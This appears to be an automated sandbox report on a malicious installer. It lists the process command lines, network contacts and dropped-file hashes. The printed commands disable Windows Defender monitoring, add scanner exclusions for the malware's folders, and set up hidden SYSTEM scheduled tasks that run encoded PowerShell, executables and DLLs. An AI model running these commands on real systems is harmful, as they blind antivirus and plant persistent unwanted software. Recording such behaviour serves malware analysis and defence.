REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gFVZKFScg" /SC once /ST 01:16:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gFVZKFScg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gFVZKFScg"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\hfwsOKJx\FcAhvhVUcyKlmmgL.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\hfwsOKJx\FcAhvhVUcyKlmmgL.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gepROiyfk" /SC once /ST 02:12:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gepROiyfk"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gepROiyfk"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 06:20:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe\" VS /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTlmQXMDCFpnewAuq"

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe VS /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\WHOECs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\HhZjtHf.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\jVrfOkL.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\aiLEFzd.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\GZdYLkX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\LvsQWsQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 01:29:01 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\rtiJfjXF\tqthEWm.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "dBpreMcpfXbehynYz"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\rtiJfjXF\tqthEWm.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\rtiJfjXF\tqthEWm.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 addons.mozilla.org udp
US 151.101.129.91:80 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:80 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 172.217.16.227:80 o.pki.goog tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 api4.check-data.xyz udp
US 35.162.118.53:80 api4.check-data.xyz tcp

Files

\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe

MD5 3b76af9e2510171d3739b8bc9ee2ee68
SHA1 4c8148a587ba7e6de8963c2d4dbbcceac39b3694
SHA256 3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768
SHA512 d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94

\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe

MD5 ad10a30760d467dade24f430b558b465
SHA1 7aaa56e80264c27d080c3b77055294593eacca1b
SHA256 44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a
SHA512 23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63

memory/2732-22-0x0000000010000000-0x0000000010F04000-memory.dmp

memory/3068-31-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/3068-30-0x000000001B690000-0x000000001B972000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 578519ff0aeebcd0c245c67ac82f6fad
SHA1 5ca23ab2a1ac94e88bc5075add6968d91c32daa8
SHA256 d624cccc99bbeee39e3b98ad5c77ffa0ce510972ddeeb78d86161fccb7f9c5cc
SHA512 4b8a73dfe9b9a52aee2f8cb57bada64d8d760f1745eaa1cc5589d8da283dea2b2b93618684958a5ef1a849ffeef6296528776a7538892a822e0601bdf88652ef

memory/1940-49-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

memory/1940-48-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0132f4d978109689c0fae10d78a4fa27
SHA1 446e28c29faa0aec1631b99d7c14719caaca8d55
SHA256 889a97e4f5eab7aeab2ef37e6c267fc4a067bd500296a6724cac6afb390ee990
SHA512 a941ae3c57b7f6563f96b2de3ed8481c3ab9f7f93f1d6f58af52e4afca7cf02893092a36e93c79b1432aa2c1c5841f58e535b11aa722ec38ab7f4ab9ff575d0c

memory/1668-60-0x000000001B670000-0x000000001B952000-memory.dmp

memory/1668-61-0x0000000002240000-0x0000000002248000-memory.dmp

C:\Windows\Temp\biwNYXhGTKCQxjLv\hfwsOKJx\FcAhvhVUcyKlmmgL.wsf

MD5 06d50465eef37ad01e0fbf99be7e785f
SHA1 4573c38949ead42184626b48d306ec596e506410
SHA256 5e6195cd87ce3f869a435348a234eb38b84a5f7317fb891e29c6bf51c8d864c4
SHA512 42338a010e2e323e38d54d0f37c47147d375ae12538a51f4f7747d83cb43df8f4f572ed524386a9b24ab9eba593316253a7229e0a0c7edd39cbe12720762c42b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 6f942021440de85f88392a82857f8d14
SHA1 24420f3ecbb242799ea4a698b59cf90f6d1eb2c3
SHA256 df79592876395e683e19ad55d76e42120fdd16d32a9f537a714fd1e162d1d174
SHA512 aa25c2b368ed99cb6be51f068afd0b730c8a66880e154b3f58cef9dfb71178e440920c0c1294b7806190ef4d21c06821120a441074d40f31d6d9313c9d46fd28

memory/596-87-0x00000000032A0000-0x0000000003325000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 f540d2c0df415904e1d224218a69eb50
SHA1 5da85671d3c3584f162d12893354a350ff7d652b
SHA256 0409055fe42c39c5a6d6d6509c4f4f8988776f309e6981f1d600051ac714c4a1
SHA512 a661d754fbb4bbd00695b02440a3a32ef2ce4bc5c51ecadda507409e460d8c6751d9f260b55daedf5bd6422984bc0ce4b690536a1c6abbbe862b0b0e89e678ab

memory/596-122-0x0000000003480000-0x00000000034EB000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 103efdadea8dc9131b76649cbba6bedf
SHA1 30d71efcf6b0935bde43f50f336d886a8a6b8585
SHA256 f7940488e3457006f40052a873db5f5d403d81b10d566a58a84eb95a5eb419ff
SHA512 f914fb73d4e2a469e54f9832b986738d12737d86687de41aae65add5fb3327a49d72653120c1d1f954d04981263259badf420cb017205c4f417bd4d07528675c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Program Files (x86)\oWxSecJNU\HhZjtHf.xml

MD5 059f06b3bb750b1426b76d4b977e7c3f
SHA1 0925fb38f7c878700417c9993050c621f3d6ee85
SHA256 ca55bba4606435fa393ec6ec4334ae9a9b2c41a6484323828494879bdf28505b
SHA512 45ea66ccdc63b95d68cf84dcecc3f7231c903d918117182826b4a0b5729a116773540801eff76356104ce2ebe80979fa30b43810dfa506785e780fd7ea09b4a0

C:\Program Files (x86)\YNUWFfCEdUiU2\jVrfOkL.xml

MD5 6013885b20e32a8828b6ea20b8fdb0e3
SHA1 7bab59dacd948d1dca87a95c7919bd3b3c4cdac9
SHA256 4ff16469d0c5f503a784609eb76b4db21d6de7b87568cec90c4b150d3b9caffb
SHA512 3fce1b7c6e2cb343f974d3b5d99c03d8311acb970f78c0adcf656a720c2f0b17f78af942273e25dc3a7dbfcc12c510900e5e1be8a1b8c4d11e75de5810e0d5e1

C:\ProgramData\eiYaNjTCbhfbMeVB\aiLEFzd.xml

MD5 4651a3c027611265c1c89fba63d6b8e6
SHA1 0d126dddb504e1f1cfa38ef21b792dbddc865f55
SHA256 84b2979ab8f4de51662cd2f29d1320b92ff674520b5f3ce23f9be850cfb9db31
SHA512 d5f5869d96f9baec02f28838899608fd4dd4bf034a1ee51d38c1aaa53c589cd6e8e6055664d25fa50e4315e972a50cf6e86345fa4f6f7e2960b288e4c387442c

C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\GZdYLkX.xml

MD5 1f86ca2721e12e3c6f9915f394218273
SHA1 cb7ce7abeeb9f59774659242c7ac41666ae9b6f6
SHA256 3b92b53184bd9a8c46bf9141692a684d8c2d297472cbb03b6c454d2138b20f75
SHA512 b04a3d5ffc5e91d05772ee2c00106a632c4eb3067b7184fad8a4b98ef478b150b8ef651a3de74cccf4de765320ebc6fa2cb25fda65230ba372359e260edc22a2

C:\Program Files (x86)\LsajhStaXkJRC\LvsQWsQ.xml

MD5 d7f0b44068b1a5e5f2e1bfbe7b51742d
SHA1 df757eb235f89923b6302899dd68cb9cfef9e9ff
SHA256 c1f84ad3301c11563936fd14f0dc2144409e612df440cd2648dfee5099504b79
SHA512 5c99b77eb4f88a05c7db637e3faf41a586a1374c1507b909914dd67c05485c63cc63fc82b4f8662a0bc5ee5b7eeaa44f44264d271efaf8d304ec69f6f62500b6

C:\Windows\Temp\biwNYXhGTKCQxjLv\rtiJfjXF\tqthEWm.dll

MD5 617698f01c7cceb3b262a98ba4da5a98
SHA1 c9244abc65ab3c485cc197ddea5e846b65d14bad
SHA256 9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754
